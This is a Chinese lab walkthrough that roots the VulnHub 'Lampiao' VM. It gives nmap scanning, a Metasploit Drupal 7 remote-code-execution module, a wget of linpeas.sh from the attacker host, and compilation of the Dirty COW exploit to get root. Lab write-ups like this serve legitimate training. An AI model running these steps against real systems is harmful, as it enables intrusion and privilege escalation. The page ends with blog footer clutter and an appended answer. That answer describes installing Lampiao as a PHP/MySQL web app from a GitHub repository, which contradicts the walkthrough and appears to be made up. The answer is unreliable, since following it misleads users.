lampiao靶机渗透流程

环境搭建

        https://www.vulnhub.com/entry/lampiao-1,249/

        靶机: lampiao  192.168.101.59

        攻击机: kali  192.168.101.31

信息收集

nmap -sV -sC -v -p- --min-rate 1000 192.168.101.59

参数解释:

        -sV: 进行服务版本的检测,确认目标主机上运行的每个开放端口的服务版本

        -sC:启用默认的脚本扫描,nmap内置了一些脚本,用于执行各种常见的网络扫描任务,例如发现漏洞等

        -v: 启用详细模式,启用这个选项,nmap将输出更多的信息,包扩扫描过程的详细进展和结果

        -p-:扫描目标主机上的所有端口,包括1到65535

        --min-rate 1000:设置了扫描的最小速率为1000个包/秒。这个选项可以帮助在扫描期间控制发送到目标主机的数据包的速率,以减轻网络负载和减少触发入侵检测系统(IDS)的风险

 可以发现开放了ssh服务以及80和1898两个web服务,可以尝试对ssh进行爆破,但无果

渗透测试

进入80端口的网站,从源码和目录都没有发现什么东西

访问1898的网站,发现是一个Drupal搭建的网站,继续进行目录扫描

发现扫出了很多东西,就先去robots.txt看看吧

我们在一个叫CHANGELOG.txt的文件中发现了该CMS的具体版本,为Drupal 7.53,去google上看看该版本有没有什么漏洞,发现该cms在7.x版本存在远程命令执行漏洞

在metasploit的库中进行搜索,发现有roby文件,可以直接在metasploit中使用,那就启动!

msfconsole
search drupal

发现有几个exp,可以尝试下excellent级别的

经过尝试之后,编号为1的exp可以利用

use 1
show options
set rhosts 192.168.101.59
set rport 1898
run

拿到普通权限的shell

升级shell

权限提升

上传一个linux信息收集工具linpeas.sh,先在kali开启网站服务

在靶机中下载该工具并赋予执行权限

cd /tmp
wget http://192.168.101.31/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

发现其内核为2016的Linux,就很可能存在脏牛漏洞

准备40847的exp

searchsploit dirty -m 40847

在靶机上下载下来编译,但普通编译出错,搜一下怎么编译的

g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
chmod +x 40847
./40847

        -O2:这是一个编译选项,表示启用优化级别2。优化级别2是一种中等级别的优化,它将尝试通过优化代码以提高执行速度和减少生成的代码大小

        -std=c++11:这个选项指定了C++的语言标准。在这里,它指定了使用C++11标准进行编译

        -pthread:这个选项告诉编译器链接pthread库,以支持多线程编程

        -lutil:这个选项告诉编译器链接libutil库

得到root的密码:dirtyCowFun,登录上去,得到root权限

在/root下找到flag

  • 24
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值